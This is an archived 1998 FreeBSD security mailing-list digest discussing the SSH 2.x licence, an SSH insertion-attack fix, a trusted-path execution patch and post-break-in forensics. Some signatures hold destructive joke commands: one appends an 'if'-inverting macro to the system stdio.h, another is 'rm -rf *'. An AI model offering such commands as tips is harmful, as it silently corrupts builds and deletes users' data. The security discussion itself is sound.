(from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07418 for freebsd-security-outgoing; Thu, 27 Aug 1998 12:24:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07339; Thu, 27 Aug 1998 12:23:49 -0700 (PDT) (envelope-from myke@ees.com) Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with SMTP id PAA04260; Thu, 27 Aug 1998 15:23:20 -0400 (EDT) (envelope-from myke@ees.com) Date: Thu, 27 Aug 1998 15:23:20 -0400 (EDT) From: Mike Holling X-Sender: myke@phluffy.lm.com To: "Ron 'The Insane One' Rosson" cc: Sheldon Hearn , dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port In-Reply-To: <19980827113954.A11893@oneinsane.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > After this post I am going to bear down and read the license. The thing that > gets me is that the previous versions before it have always been 'freely > distributable'. This is starting to smell like the same thing > that happened with Xfree. I could be wrong. If anyone has nessus installed > on their system and ssh also you will pick up on the possibility of an > insecure ssh. Again I could e wrong and jumping in the wrong direction > but it kinda rattled my cage. I believe the 2.x branch is a complete rewrite of the code, done by DataFellows. It's essentially a different codebase done by different people. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 12:45:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA12512 for freebsd-security-outgoing; Thu, 27 Aug 1998 12:45:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts04-067.dublin.indigo.ie [194.125.148.197]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA12456 for ; Thu, 27 Aug 1998 12:45:04 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id UAA01055; Thu, 27 Aug 1998 20:37:21 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199808271937.UAA01055@indigo.ie> Date: Thu, 27 Aug 1998 20:37:16 +0000 In-Reply-To: ; Nicholas Charles Brawn Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Nicholas Charles Brawn , freebsd-security@FreeBSD.ORG Subject: Re: trusted path execution patch Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Aug 26, 2:32am, Nicholas Charles Brawn wrote: } Subject: trusted path execution patch > For those not familiar with route's patch (Phrack 52, article 6), it > limits the execution of binaries to those in directories designated as > "trusted". That being (in this case), those that aren't writable by > group or other, and are owned by either root, bin, or have the gid of a > "trusted" group. So are you going to audit all those utilities in the trusted path for buffer overflows? Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 12:49:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA13384 for freebsd-security-outgoing; Thu, 27 Aug 1998 12:49:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id MAA13246 for ; Thu, 27 Aug 1998 12:48:49 -0700 (PDT) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140593-1>; Thu, 27 Aug 1998 19:41:49 +0200 Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id TAA26218; Thu, 27 Aug 1998 19:41:20 +0200 (CEST) Received: from ripley(192.168.42.202) by morranon via smap (V2.1) id xma026216; Thu, 27 Aug 98 19:41:16 +0200 From: "Lutz Albers" To: "Brian Reichert" , Subject: RE: post breakin log Date: Thu, 27 Aug 1998 19:40:58 +0200 Message-ID: <000b01bdd1e1$d97ebb10$ca2aa8c0@ripley.tavari.muc.de> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <19980827125922.A29892@numachi.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > > Watch bugtrax, www.rootshell.org, CERT, etc. > > I can't find a host called www.rootshell.org. Any pointers? Because it's called www.rootshell.com :-) ? -- Lutz Albers, lutz@muc.de, pgp key available from Do not take life too seriously, you will never get out of it alive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 13:13:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20007 for freebsd-security-outgoing; Thu, 27 Aug 1998 13:13:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA19921; Thu, 27 Aug 1998 13:13:05 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (IDENT:lBZeteBEEEBfws5XGGyKV3Q3JnU2CWVH@localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id WAA15852; Thu, 27 Aug 1998 22:11:09 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199808272011.WAA15852@gratis.grondar.za> To: dima@best.net cc: insane@oneinsane.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port Date: Thu, 27 Aug 1998 22:11:06 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org wrote: > Grrr, I just went through the license. Sucks. > Btw, I was under impression that 1.26 has a fix for the insertion attack... 1.25 has this. 2.n is the encumbered version. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 13:14:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20311 for freebsd-security-outgoing; Thu, 27 Aug 1998 13:14:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA20241; Thu, 27 Aug 1998 13:14:34 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id NAA02376; Thu, 27 Aug 1998 13:13:14 -0700 (PDT) Message-Id: <199808272013.NAA02376@burka.rdy.com> Subject: Re: SSH port In-Reply-To: <199808272011.WAA15852@gratis.grondar.za> from Mark Murray at "Aug 27, 1998 10:11: 6 pm" To: mark@grondar.za (Mark Murray) Date: Thu, 27 Aug 1998 13:13:13 -0700 (PDT) Cc: dima@best.net, insane@oneinsane.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mark Murray writes: > wrote: > > Grrr, I just went through the license. Sucks. > > Btw, I was under impression that 1.26 has a fix for the insertion attack... > > 1.25 has this. > > 2.n is the encumbered version. Then the case is closed, I guess. > M > -- > Mark Murray > Join the anti-SPAM movement: http://www.cauce.org > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 13:38:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA24512 for freebsd-security-outgoing; Thu, 27 Aug 1998 13:38:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA24499 for ; Thu, 27 Aug 1998 13:38:38 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id WAA04257; Thu, 27 Aug 1998 22:37:40 +0200 (MET DST) Received: (from dag-erli@localhost) by hrotti.ifi.uio.no ; Thu, 27 Aug 1998 22:37:39 +0200 (MET DST) Mime-Version: 1.0 To: "Jordan K. Hubbard" Cc: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy)), security@FreeBSD.ORG Subject: Re: post breakin log References: <7706.904208088@time.cdrom.com> Organization: University of Oslo, Department of Informatics X-url: http://www.stud.ifi.uio.no/~dag-erli/ X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list X-disclaimer-1: The views expressed in this article are mine alone, and do X-disclaimer-2: not necessarily coincide with those of any organisation or X-disclaimer-3: company with which I am or have been affiliated. X-Stop-Spam: http://www.cauce.org/ From: dag-erli@ifi.uio.no (Dag-Erling Coidan =?iso-8859-1?Q?Sm=F8rgrav?= ) Date: 27 Aug 1998 22:37:39 +0200 In-Reply-To: "Jordan K. Hubbard"'s message of "Thu, 27 Aug 1998 01:54:48 -0700" Message-ID: Lines: 19 X-Mailer: Gnus v5.5/Emacs 19.34 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id NAA24500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" writes: > > > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your > > > system on a daily basis. > > Is there a site one can read more on this? > Not to my knowledge. Alta Vista or your search engine of choice is > highly recommended. :) (alpha and omega) (every root kit in existence...) (searchable BUGTRAQ archive) (BUGTRAQ home pages) The latter is down at the moment (and has been for a while), but as I understand things Aleph1 intends to bring it back up some time. It used to have listings of root exploits by OS version and by app. DES -- Dag-Erling Smørgrav - dag-erli@ifi.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 14:21:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02628 for freebsd-security-outgoing; Thu, 27 Aug 1998 14:21:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02605; Thu, 27 Aug 1998 14:21:16 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id OAA17576; Thu, 27 Aug 1998 14:20:12 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 14:20:11 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: "Ron 'The Insane One' Rosson" cc: dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port In-Reply-To: <19980827115247.B11893@oneinsane.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org AFAIK both .25 and .26 have crc data injection bug fixed: % ssh -v -p 139 twentythree.jkb.org SSH Version 1.2.25 [i386-unknown-freebsd2.2.6], protocol version 1.5. Compiled with RSAREF. [snip] 0wn.jkb.org: Sent encrypted session key. 0wn.jkb.org: Installing crc compensation attack detector 0wn.jkb.org: Received encrypted confirmation. [snip] Is there another bug you guys are talking about? And yes, the license does blow. That means ISPs will have to pay if they want to use ssh2 -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Ron 'The Insane One' Rosson wrote: >On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote: >> Grrr, I just went through the license. Sucks. >> Btw, I was under impression that 1.26 has a fix for the insertion attack... > >If you find the fix for the assertion let me know.. I would like to get this >one headache cleared up. I love my ssh. > >> >> Ron 'The Insane One' Rosson writes: >> > On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote: >> > > >> > > >> > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote: >> > > >> > > > Is there a reason why we dont have a port of the ver 2.x >> > > > ssh. >> > > >> > > It may have something to do with the software not being freely >> > > distributable. This is from the LICENSE document in the tarball: >> > > >> > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS >> > > | FOR NON-COMMERCIAL USE ONLY. >> > > | >> > > | Please contact Data Fellows for >> > > | commercial licensing. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 15:07:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA11350 for freebsd-security-outgoing; Thu, 27 Aug 1998 15:07:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA11252; Thu, 27 Aug 1998 15:07:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id QAA16656; Thu, 27 Aug 1998 16:06:08 -0600 (MDT) Message-Id: <199808272206.QAA16656@lariat.lariat.org> X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta) Date: Thu, 27 Aug 1998 16:05:20 -0600 To: insane@oneinsane.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: SSH port In-Reply-To: <19980827092138.B9553@oneinsane.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It may be time for a new rev of SSH anyway. IBM's recently announced method of shutting down known ciphertext "man in the middle" attacks is worth adding to the protocol. --Brett At 09:21 AM 8/27/98 -0700, Ron 'The Insane One' Rosson wrote: >Is there a reason why we dont have a port of the ver 2.x >ssh. There appears to be an insertion attack in the 1.26 >version that we have in our ports. Sorry for the cross >psot but theis came to my attention from running some tests >on my own machines. >TIA >Ron >-- >-------------------------------------------------------- >Ron Rosson ... and a UNIX user said ... >The InSaNe One rm -rf * >insane@oneinsane.net and all was null and void >-------------------------------------------------------- >It's so nice to be insane, nobody asks you to explain. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 15:58:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA21146 for freebsd-security-outgoing; Thu, 27 Aug 1998 15:58:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA21106; Thu, 27 Aug 1998 15:58:17 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id QAA12344; Thu, 27 Aug 1998 16:56:49 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id QAA19327; Thu, 27 Aug 1998 16:56:47 -0600 Date: Thu, 27 Aug 1998 16:56:47 -0600 Message-Id: <199808272256.QAA19327@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Mike Holling Cc: "Ron 'The Insane One' Rosson" , Sheldon Hearn , dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port In-Reply-To: References: <19980827113954.A11893@oneinsane.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I believe the 2.x branch is a complete rewrite of the code, done by > DataFellows. It's essentially a different codebase done by different > people. Oooh, that's scarey, especially given how buggy their Win32 client is. :( Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 17:27:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA05762 for freebsd-security-outgoing; Thu, 27 Aug 1998 17:27:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA05630 for ; Thu, 27 Aug 1998 17:26:44 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id SAA18015; Thu, 27 Aug 1998 18:25:37 -0600 (MDT) Message-Id: <199808280025.SAA18015@lariat.lariat.org> X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta) Date: Thu, 27 Aug 1998 18:24:46 -0600 To: "Gregory P. Smith" , security@FreeBSD.ORG From: Brett Glass Subject: Re: SSH port In-Reply-To: <199808280021.RAA03533@ryouko.nas.nasa.gov> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sure. See http://www.research.ibm.com/news/detail/encryption.html There's an overview and a link to the paper. --Brett At 05:21 PM 8/27/98 -0700, Gregory P. Smith wrote: > >> It may be time for a new rev of SSH anyway. IBM's recently announced >> method of shutting down known ciphertext "man in the middle" attacks >> is worth adding to the protocol. > >Care to elaborate on this one (ie: a reference to the announcement or >an explanation?). (cc' the list as others are bound to ask the same >question :) > >Thanks, >Greg > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 17:49:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA10426 for freebsd-security-outgoing; Thu, 27 Aug 1998 17:49:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA10396 for ; Thu, 27 Aug 1998 17:49:05 -0700 (PDT) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.8.8/8.8.8) id TAA08252; Thu, 27 Aug 1998 19:47:59 -0500 (CDT) Message-ID: <19980827194759.15155@futuresouth.com> Date: Thu, 27 Aug 1998 19:47:59 -0500 From: "Matthew D. Fuller" To: Brian Behlendorf Cc: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> <19980827182323.6798.qmail@hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88 In-Reply-To: <19980827182323.6798.qmail@hyperreal.org>; from Brian Behlendorf on Thu, Aug 27, 1998 at 11:16:01AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 27, 1998 at 11:16:01AM -0700, Brian Behlendorf woke me up to tell me: > At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: > >the log from history follows. > > Is there a fool-proof way to get user histories like this? I got one once > only because the cracker was lame enough to forget to delete his > .bash_history file. Presuming root isn't compromised of course... Command accounting's a pretty good way. And if you raise the secure level and set the acct file append_only (sappend flag?), it's pretty foolproof. Very spammable if they catch up, but fairly foolproof. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* | FreeBSD; the way computers were meant to be | * "The only reason I'm burning my candle at both ends, is * | that I haven't figured out how to light the middle yet."| * fullermd@futuresouth.com :-} MAtthew Fuller * | http://keystone.westminster.edu/~fullermd | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 18:08:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA13604 for freebsd-security-outgoing; Thu, 27 Aug 1998 18:08:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA13594; Thu, 27 Aug 1998 18:08:13 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id VAA05914; Thu, 27 Aug 1998 21:07:35 -0400 Message-ID: <19980827210735.D2932@puck.nether.net> Date: Thu, 27 Aug 1998 21:07:35 -0400 From: Jared Mauch To: Brett Glass , insane@oneinsane.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port References: <19980827092138.B9553@oneinsane.net> <199808272206.QAA16656@lariat.lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199808272206.QAA16656@lariat.lariat.org>; from Brett Glass on Thu, Aug 27, 1998 at 04:05:20PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm sure some interesting things are happening @ ietf re the ssh protocol. www.ietf.org for those who aren't ietf savvy On Thu, Aug 27, 1998 at 04:05:20PM -0600, Brett Glass wrote: > It may be time for a new rev of SSH anyway. IBM's recently announced > method of shutting down known ciphertext "man in the middle" attacks > is worth adding to the protocol. > > --Brett > > > At 09:21 AM 8/27/98 -0700, Ron 'The Insane One' Rosson wrote: > > >Is there a reason why we dont have a port of the ver 2.x > >ssh. There appears to be an insertion attack in the 1.26 > >version that we have in our ports. Sorry for the cross > >psot but theis came to my attention from running some tests > >on my own machines. > >TIA > >Ron > >-- > >-------------------------------------------------------- > >Ron Rosson ... and a UNIX user said ... > >The InSaNe One rm -rf * > >insane@oneinsane.net and all was null and void > >-------------------------------------------------------- > >It's so nice to be insane, nobody asks you to explain. > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net | http://puck.nether.net/~jared/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 18:39:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA19775 for freebsd-security-outgoing; Thu, 27 Aug 1998 18:39:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from speedy.nethampton.com (speedy.nethampton.com [207.252.75.40]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA19761 for ; Thu, 27 Aug 1998 18:39:13 -0700 (PDT) (envelope-from tplatt@nethampton.com) Date: Thu, 27 Aug 1998 18:39:13 -0700 (PDT) Received: (qmail 13299 invoked from network); 28 Aug 1998 01:36:00 -0000 Received: from teebee.hamptons.com (HELO ?204.141.112.245?) (204.141.112.245) by speedy.nethampton.com with SMTP; 28 Aug 1998 01:36:00 -0000 X-Sender: tplatt@nethampton.com (Unverified) Message-Id: In-Reply-To: References: <10509.904217819@gjp.erols.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: security@FreeBSD.ORG From: "Timothy R. Platt" Subject: Re: post breakin log Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Huh? From the bnc distribution README (bnc is in the FreeBSD ports collection, btw): 1.INTRODUCTION BNC is a simple program designed to Proxy irc sessions. It is user configurable using the file bnc.conf and includes multi-user, passwords, and other basic necessities. NOW INCLUDES VIRTUAL HOSTS!!! ;P 2.COMPILATION I would tell you how to un-tar/gz this file, but your reading this so why would you need help :-) To compile bnc simply type: make 3.CONFIGURATION The configuration file give BNC the nessesary info to process such as the port to bind to and what port to request when a conn is requested, also passwords and maxusers. 4.LOADING type: bnc 5.CLIENT SIDE When using various clients you connect to the server in which the daemon is ran. In ircii and other clients you will have to give your password by typing /quote pass to continue, in Mirc you can simply /server bnc.server.net port pass to connect. Once your pass is ok'ed you can tell it to connect to an irc server by typing /quote conn [irc.server.net] . added /quote VIP [Virtual.host] for on the fly ip switching. It must be done before you /quote conn. 6.GNU Yeah you know how this works so just realize this is gnu. This is the only bnc I've seen.. Tim > Arggh! I just remembered. Gary is correct If you download netcat >it comes with some scripts, bnc is one of them. It will listen on a port >and upon connect will drop you in to shell as root. Please do: > ># netstat -an | grep LIST > >and check to make sure you know what all the ports are. If I'd be you I'd >re-install since who knows what you at going with crontab, at, mail >aliases, etc. > >-- Yan > >www.best.com/~jkb/ Unix users of the world unite: >www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >"Turn up the lights, I don't want to go home in the dark." > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 19:22:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA27819 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:22:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA27743 for ; Thu, 27 Aug 1998 19:22:23 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id MAA12967; Fri, 28 Aug 1998 12:21:19 +1000 (EST) Date: Fri, 28 Aug 1998 12:21:19 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Niall Smart cc: freebsd-security@FreeBSD.ORG Subject: Re: trusted path execution patch In-Reply-To: <199808271937.UAA01055@indigo.ie> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Niall Smart wrote: > On Aug 26, 2:32am, Nicholas Charles Brawn wrote: > } Subject: trusted path execution patch > > > For those not familiar with route's patch (Phrack 52, article 6), it > > limits the execution of binaries to those in directories designated as > > "trusted". That being (in this case), those that aren't writable by > > group or other, and are owned by either root, bin, or have the gid of a > > "trusted" group. > > So are you going to audit all those utilities in the trusted path > for buffer overflows? > > Niall > > -- > Niall Smart, rotel@indigo.ie. > Amaze your friends and annoy your enemies: > echo '#define if(x) if (!(x))' >> /usr/include/stdio.h > Hahah. Well, that's another problem that was pointed out. I'm working on an idea that has been tossed around before to prevent buffer overflows. And no, i'm not suggesting we recompile everything with stackguard. :) Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 19:34:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA29758 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:34:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29662 for ; Thu, 27 Aug 1998 19:33:40 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id 